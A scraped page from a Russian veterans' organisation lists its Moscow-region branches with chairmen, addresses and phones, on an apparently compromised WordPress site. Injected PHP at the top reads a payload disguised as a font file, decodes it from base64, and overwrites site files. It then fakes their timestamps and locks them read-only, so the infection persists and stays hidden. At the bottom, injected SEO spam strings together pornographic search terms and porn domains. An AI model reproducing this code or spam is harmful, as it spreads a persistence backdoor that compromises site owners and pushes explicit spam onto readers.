$wp_update_file="/home/u220714/bbmoru/www/wp-includes/fonts/dashicons.woff0"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Местные отделения
27.05.2024

Местные отделения

Список адресов и телефонов местных отделений Московского областного отделения «БОЕВОЕ БРАТСТВО»

Отделение Председатель Адрес Телефон
1 Балашихинское ГО Яковлев Сергей Георгиевич г. Балашиха мкр. Железнодорожный, ул. Маяковского стр. 3а 8-495-527-31-99
2 Бронницкое ГО Патрушев Николай Владимирович Бронницы Комсомольский пер. д.53, ком.118 8-496-46-64-430
4 Волоколамское РО Паршин Олег Петрович
5 Воскресенское РО Слепцов Юрий Федорович г. Воскресенск, ул. Победы д. 7 8-916-266-51-60
7 Дзержинское ГО Русанов Александр Геннадьевич 8-917-579-84-84
8 Дмитровское РО Кузовлев Владимир Юрьевич г. Дмитров ул.Почтовая 16 8 926 718 21 86
9 Долгопрудненское РО Копанец Александр Викторович г. Долгопрудный ул. Ак. Лаврентьева д. 23 каб. 5 8-903-583-80-66
10 Домодедовское РО Кирин Алексей Леонтьевич г.Домодедово,ул.Каширское шоссе д.40 8 (496) 793 22 64
11 Дубненское ГО Фатнев Сергей Николаевич г. Дубна ул. Дачная д.1 8-496-212-75-29
11 Жуковское ГО Гришин Николай Степанович г. Жуковский ул. Чкалова д.24 8-926-798-11-39
12 Егорьевское ГО Сывороткин Сергей Михайлович г. Егорьевск 6 мкр. д. 27 стр. 1 8-4964-04-70-70
14 Зарайское РО Заболуев Владимир Николаевич г. Зарайск ул. К. Маркса д. 49/11 8-967-248-41-23
15 Ивантеевское ГО Кузьменко Валерий Владимирович г. Ивантеевка ул. Первомайская д. 30/2 8-916-691-70-03
16 Истринское РО Гирев Николай Николаевич г. Истра ул. Ленина д. 112 8-495-994-59-58
18 Каширское ГО Серяпин Александр Александрович г. Кашира ул. Ленина д. 2 каб. 249 8-977-890-40-95
18 Клинское РО Пугачев Александр Васильевич г. Клин Тверской пр-д д. 10 оф. 12 8-4962-49-79-66
19 Коломенское ГО Федоров Дмитрий Владимирович г. Коломна ул. Леваневского д. 2 8-905-708-68-67
20 Королевское ГО Водопьянов Владимир Александрович г. Королев ул. Толстого д. 4а, кв. 23 8-903-241-00-42
21 Красноармейское ГО Михайлов Александр Львович г. Красноармейск мкр. Северный д.21 А 8-916-020-22-09
22 Красногорское РО Куприянов Игорь Евгеньевич г. Красногорск ул. Ленина д. 3 ком. 240 8-909-643-26-28
23 Краснознаменское ГО Исаев Александр Владимирович г. Краснознаменск ул. Краснознознаменная д. 27 8-926-338-99-52
24 Ленинское РО Орлов Николай Иванович 8-915-460-25-42
25 Лобненское ГО Толмачева Марина Валентиновна г. Лобня ул. Мирная д. 13 к.2 / пн,ср. 10.00 – 14.00 / 8-916-586-98-13
26 Лосино-Петровское ГО Мельничук Иван Михайлович Московская обл., г. Лосино-Петровский, ул. Октябрьская, д.6, каб.16. 8-903-269-58-94; 8-977-444-70-63
27 Лотошинское РО Быков Михаил Петрович п. Лотошино ул. Колхозная д. 41 8-967-091-38-76
28 Луховицкое РО Веселов Сергей Михайлович г Луховицы ул. Советская д. 8а 8-917-508-42-53
30 Люберецкое РО Долгов Сергей Николаевич г. Люберцы Октябрьский проспект д. 190 каб. 208 8-495-518-91-49, 8-495-771-54-99
31 Можайское РО Горчаков Александр Викторович г. Можайск ул. Рабочая д. 16 8-926-762-79-84
32 Мытищинское РО Муравьёв Вячеслав Алексеевич г. Мытищи Новомытищинский проспект д. 30/1 кв. 310 /пн, вт, ср, чт, пт. 10.00 – 18.00; обед 13.00 – 14.00/  8-926-903-25-68
33 Наро-Фоминское РО Тестов Сергей Алексеевич г. Наро-Фоминск ул. Ленина д. 11 8-926-366-82-72
34 Ногинское РО Хатин Александр Сергеевич г. Ногинск ул. Рабочая д. 57 8-4965-11-46-43
35 Одинцовское РО Якушев Николай Романович г. Одинцово Бульвар Любы Новоселовой д. 5 8-495-599-18-94
36 Озерское РО Шабалин Владимир Иванович г. Озеры ул. Ленина д. 20 к. 16 8-926-929-47-79
37 Орехово-Зуевское ГО Федосеев Дмитрий Николаевич  г. Орехово-Зуево ул. Ленина д.100/1 8-926-393-99-44
38 Орехово-Зуевское РО Макаров Владимир Васильевич 8-915-356-78-20
39 Павлово-Посадское РО Кондаков Олег Владимирович г. Павловский Посад ул. Ленина д. 5 8-4964-32-14-48, 8-903-112-77-67
40 Подольское ГО Рассамакин Вячеслав Иванович г. Подольск ул. Большая Зеленовская д.31 А 8-4967-63-09-16
41 Протвинское ГО Торгунаков Сергей Сергеевич г. Протвино Фестивальный проезд, д.1 8-926-353-87-05
42 Пушкинское РО Борисов Сергей Михайлович г. Пушкино ул. Чехова д. 37 8-495-993-38-08,8-903-973-83-44
43 Пущинское ГО Донец Виктор Павлович г. Пущино мкр. «В» д. 1 ком. 37 8-4967-73-06-90
44 Раменское ГО Тарасов Олег Васильевич 8-916-800-48-93
46 Рузское РО Артёмов Сергей Александрович г. Руза Микрорайон д. 10 8-4962-72-43-10
47 Сергиево-Посадское РО Чугуров Валерий Борисович г. Сергиев-Посад пр. Красной Армии д. 136. ком. 10 8-915-285-64-27
48 Серебряно-Прудское РО Максимов Вячеслав Анатольевич п. Серебряные Пруды ул. Первомайская д. 11. к. 10 8-4966-73-12-98
49 Серпуховское ГО Бочкарёв Евгений Вениаминович г. Серпухов ул. Советская д.61 офис 2 8-903-757-27-77
50 Солнечногорское РО Воробьёв Андрей Анатольевич г. Солнечногорск промзона Рекинцо д.8 8-985-858-11-11
51 Ступинское РО Колтыгин Игорь Николаевич г. Ступино ул. Транспортная вл. 13 8-4966-42-63-81
52 Талдомское РО Черторижский Сергей Владимиров Талдомский р-н, п.Вербилки ул. Зарыбина д. 4 8-495-994-94-23
54 Фрязинское ГО Смирнов Николай Константинович г. Фрязино пр-д Десантников д. 5 кв. 73 8-496-25-5-55-25
55 Химкинское ГО Корбут Сергей Васильевич 8-495-573-32-38
56 Черноголовское ГО Эзерош Олег Аврелович г. Черноголовка Школьный бульвар д. 13 с 11.00 до 16.00 8-4965-24-90-03
57 Чеховское РО Осанов Владимир Исаевич г. Чехов ул. Московская д. 22 8-49672-6-92-37
58 Шатурское РО Языков Олег Николаевич
60 Щелковское РО Тананаев Анатолий Павлович 8-925-833-15-69
61 Электрогорское ГО Тикунов Роман Игоревич г. Электрогорск ул. Энгельса д. 10 8-916-712-05-45
62 Электростальское ГО Латынин Дмитрий Александрович г. Электросталь ул. Первомайская д. 28 кв. 8-903-570-30-44
tunay na kaibigan tvteleserye.net maria clara at ibarra full episode 99 اب ينيك بنته سكس meyzo.mobi بنات تخينة natasha malkova pornhub asianporntrends.com hd zog.com majedar sex foxporns.info beyonce sex shilpa shetty hot scene stepmomporntrends.com mallu new porn
www.coolmoviez.com nimila.net hot shilpa shetty boobs multixnxx tubebox.mobi porn very hot video قبلات ساخنة متحركة porndot.info صور سكس نانسى عجرم bangla xxx bf nudevista.pro mallu soft doctor and nurse sex videos prontv.mobi romantic hard sex videos
sd movies point in iporntv.mobi sindhu menon hot delhi bf video orangetube.org sophie chaudhary pundaivideo redwap.xyz tamil desi xvideos south blue film newcooltube.mobi badmasti..com sex vidio dawonlod porngonzo.mobi indein sex video com